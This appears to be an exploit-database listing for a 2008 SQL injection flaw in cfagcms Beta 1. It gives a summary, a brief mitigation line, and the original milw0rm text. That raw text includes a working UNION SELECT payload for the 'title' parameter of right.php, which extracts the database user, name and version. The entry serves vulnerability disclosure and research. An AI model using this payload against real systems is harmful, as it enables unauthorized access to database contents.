header-logo
Suggest Exploit
vendor:
cfagcms
by:
ZoRLu
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: cfagcms
Affected Version From: cfagcms Beta 1
Affected Version To: cfagcms Beta 1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

cfagcms Beta 1 sql inj.

An attacker can exploit a SQL injection vulnerability in cfagcms Beta 1 to gain access to sensitive information such as user credentials, database name, and version. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'title' parameter of the 'right.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. This will allow the attacker to gain access to sensitive information from the database.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

cfagcms Beta 1 sql inj.
 
download: http://mesh.dl.sourceforge.net/sourceforge/cfagcms/cfagcms.zip
 
Discovered By: ZoRLu
 
z0rlu.blogspot.com
 
trt-turk@hotmail.com    
 
date: 23.10.2008
 
N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
------------------------------------------------------------------
 
exploit:
 
http://localhost/cfagcms/right.php?title=[SQL]
 
[SQL]=
 
ZoRLu'+union+select+0,concat(user(),0x3a,database(),0x3a,version()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
 
------------------------------------------------------------------
 
thanks: str0ke
 
a.q kpss

# milw0rm.com [2008-12-15]

Navigation

Suggest Exploit

Services By CQR